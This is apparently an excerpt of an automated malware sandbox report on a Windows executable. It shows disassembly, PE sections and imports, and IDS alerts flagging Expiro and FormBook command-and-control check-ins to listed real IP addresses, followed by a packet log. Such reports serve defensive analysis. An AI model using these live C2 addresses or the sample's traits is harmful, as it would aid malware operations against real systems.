                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007FA8D171ECFAh
                                                                            cmp edi, eax
                                                                            jc 00007FA8D171F05Eh
                                                                            bt dword ptr [004C31FCh], 01h
                                                                            jnc 00007FA8D171ECF9h
                                                                            rep movsb
                                                                            jmp 00007FA8D171F00Ch
                                                                            cmp ecx, 00000080h
                                                                            jc 00007FA8D171EEC4h
                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007FA8D171ED00h
                                                                            bt dword ptr [004BE324h], 01h
                                                                            jc 00007FA8D171F1D0h
                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                            jnc 00007FA8D171EE9Dh
                                                                            test edi, 00000003h
                                                                            jne 00007FA8D171EEAEh
                                                                            test esi, 00000003h
                                                                            jne 00007FA8D171EE8Dh
                                                                            bt edi, 02h
                                                                            jnc 00007FA8D171ECFFh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007FA8D171ED03h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007FA8D171ED55h
                                                                            bt esi, 03h
                                                                            jnc 00007FA8D171EDA8h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5f9e8.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x8dcc40x8de003090a3327bcf1f126c5c7f9e4891301cFalse0.5728679102422908data6.676131091367248IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0xc70000x5f9e80x5fa0021019439c6f49fdb7d0a6674460d86ebFalse0.9315512663398693data7.901922834254712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1270000x960000x950008797384e48bfe3e35b4e2097f46a7bcbFalse0.9757530673238255data7.938061157054464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                            RT_RCDATA0xcf7b80x56caddata1.0003263000666665
                                                                            RT_GROUP_ICON0x1264680x76dataEnglishGreat Britain0.6610169491525424
                                                                            RT_GROUP_ICON0x1264e00x14dataEnglishGreat Britain1.25
                                                                            RT_GROUP_ICON0x1264f40x14dataEnglishGreat Britain1.15
                                                                            RT_GROUP_ICON0x1265080x14dataEnglishGreat Britain1.25
                                                                            RT_VERSION0x12651c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                            RT_MANIFEST0x1265f80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                            Imports

                                                                            DLLImport
                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                            UxTheme.dllIsThemeActive
                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishGreat Britain

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2025-01-11T03:29:01.710695+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.849705TCP
                                                                            2025-01-11T03:29:01.710695+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.849705TCP
                                                                            2025-01-11T03:29:02.139160+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.84970618.141.10.10780TCP
                                                                            2025-01-11T03:29:38.153479+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849711161.97.142.14480TCP
                                                                            2025-01-11T03:29:38.153479+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849711161.97.142.14480TCP
                                                                            2025-01-11T03:29:54.604282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971323.225.160.13280TCP
                                                                            2025-01-11T03:29:57.198005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971423.225.160.13280TCP
                                                                            2025-01-11T03:29:59.729424+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84971523.225.160.13280TCP
                                                                            2025-01-11T03:30:02.244910+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84971623.225.160.13280TCP
                                                                            2025-01-11T03:30:02.244910+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84971623.225.160.13280TCP
                                                                            2025-01-11T03:30:09.276305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849717149.88.81.19080TCP
                                                                            2025-01-11T03:30:11.823282+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849718149.88.81.19080TCP
                                                                            2025-01-11T03:30:14.370041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849719149.88.81.19080TCP
                                                                            2025-01-11T03:30:36.774129+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849720149.88.81.19080TCP
                                                                            2025-01-11T03:30:36.774129+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849720149.88.81.19080TCP
                                                                            2025-01-11T03:30:43.409205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972385.159.66.9380TCP
                                                                            2025-01-11T03:30:45.950346+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972485.159.66.9380TCP
                                                                            2025-01-11T03:30:48.520763+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972585.159.66.9380TCP
                                                                            2025-01-11T03:31:50.256479+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972685.159.66.9380TCP
                                                                            2025-01-11T03:31:50.256479+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84972685.159.66.9380TCP
                                                                            2025-01-11T03:31:55.939008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727185.27.134.14480TCP
                                                                            2025-01-11T03:31:58.520385+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849728185.27.134.14480TCP
                                                                            2025-01-11T03:32:01.061440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849729185.27.134.14480TCP
                                                                            2025-01-11T03:32:03.584409+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849730185.27.134.14480TCP
                                                                            2025-01-11T03:32:03.584409+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849730185.27.134.14480TCP
                                                                            2025-01-11T03:32:09.561620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849731104.21.95.16080TCP
                                                                            2025-01-11T03:32:12.141540+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849732104.21.95.16080TCP
                                                                            2025-01-11T03:32:14.684573+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849733104.21.95.16080TCP
                                                                            2025-01-11T03:32:17.220453+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849734104.21.95.16080TCP
                                                                            2025-01-11T03:32:17.220453+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849734104.21.95.16080TCP
                                                                            2025-01-11T03:32:23.035066+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735188.114.97.380TCP
                                                                            2025-01-11T03:32:25.594023+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849736188.114.97.380TCP
                                                                            2025-01-11T03:32:28.125662+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849737188.114.97.380TCP
                                                                            2025-01-11T03:32:30.684068+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849738188.114.97.380TCP
                                                                            2025-01-11T03:32:30.684068+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849738188.114.97.380TCP
                                                                            2025-01-11T03:32:36.631692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849739154.88.22.10180TCP
                                                                            2025-01-11T03:32:39.172598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849740154.88.22.10180TCP
                                                                            2025-01-11T03:32:41.713395+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849741154.88.22.10180TCP
                                                                            2025-01-11T03:32:44.250506+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849742154.88.22.10180TCP
                                                                            2025-01-11T03:32:44.250506+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849742154.88.22.10180TCP
                                                                            2025-01-11T03:32:49.867503+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849743209.74.77.10780TCP
                                                                            2025-01-11T03:32:52.445463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849744209.74.77.10780TCP
                                                                            2025-01-11T03:32:55.026836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849745209.74.77.10780TCP
                                                                            2025-01-11T03:32:57.547399+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849746209.74.77.10780TCP
                                                                            2025-01-11T03:32:57.547399+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849746209.74.77.10780TCP
                                                                            2025-01-11T03:33:11.862420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849747104.21.48.180TCP
                                                                            2025-01-11T03:33:14.400430+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849748104.21.48.180TCP
                                                                            2025-01-11T03:33:16.953921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849749104.21.48.180TCP
                                                                            2025-01-11T03:33:19.491866+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849750104.21.48.180TCP
                                                                            2025-01-11T03:33:19.491866+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849750104.21.48.180TCP
                                                                            2025-01-11T03:33:27.895923+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975120.2.249.780TCP
                                                                            2025-01-11T03:33:30.440328+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975220.2.249.780TCP
                                                                            2025-01-11T03:33:32.975054+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975320.2.249.780TCP
                                                                            2025-01-11T03:33:35.521212+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975420.2.249.780TCP
                                                                            2025-01-11T03:33:35.521212+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84975420.2.249.780TCP
                                                                            2025-01-11T03:33:41.767203+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849755156.251.17.22480TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 11, 2025 03:29:00.693599939 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:00.698594093 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:00.698685884 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:00.699383974 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:00.699383974 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:00.704241037 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:00.704255104 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:01.402398109 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:01.402498007 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:01.402777910 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:01.705796957 CET4970580192.168.2.854.244.188.177
                                                                            Jan 11, 2025 03:29:01.710695028 CET804970554.244.188.177192.168.2.8
                                                                            Jan 11, 2025 03:29:01.823972940 CET4970680192.168.2.818.141.10.107
                                                                            Jan 11, 2025 03:29:01.828857899 CET804970618.141.10.107192.168.2.8
                                                                            Jan 11, 2025 03:29:01.828938007 CET4970680192.168.2.818.141.10.107
                                                                            Jan 11, 2025 03:29:01.829313040 CET4970680192.168.2.818.141.10.107
                                                                            Jan 11, 2025 03:29:01.829334974 CET4970680192.168.2.818.141.10.107
                                                                            Jan 11, 2025 03:29:01.834198952 CET804970618.141.10.107192.168.2.8
                                                                            Jan 11, 2025 03:29:01.834212065 CET804970618.141.10.107192.168.2.8
                                                                            Jan 11, 2025 03:29:02.139159918 CET4970680192.168.2.818.141.10.107
                                                                            Jan 11, 2025 03:29:37.537672997 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:37.542545080 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:37.542669058 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:37.553262949 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:37.559377909 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153275967 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153337002 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153345108 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153469086 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153479099 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:38.153481007 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:38.153531075 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:38.159544945 CET4971180192.168.2.8161.97.142.144
                                                                            Jan 11, 2025 03:29:38.164817095 CET8049711161.97.142.144192.168.2.8
                                                                            Jan 11, 2025 03:29:54.044404984 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:54.049226046 CET804971323.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:54.049303055 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:54.070013046 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:54.074827909 CET804971323.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:54.559122086 CET804971323.225.160.132192.168.2.8
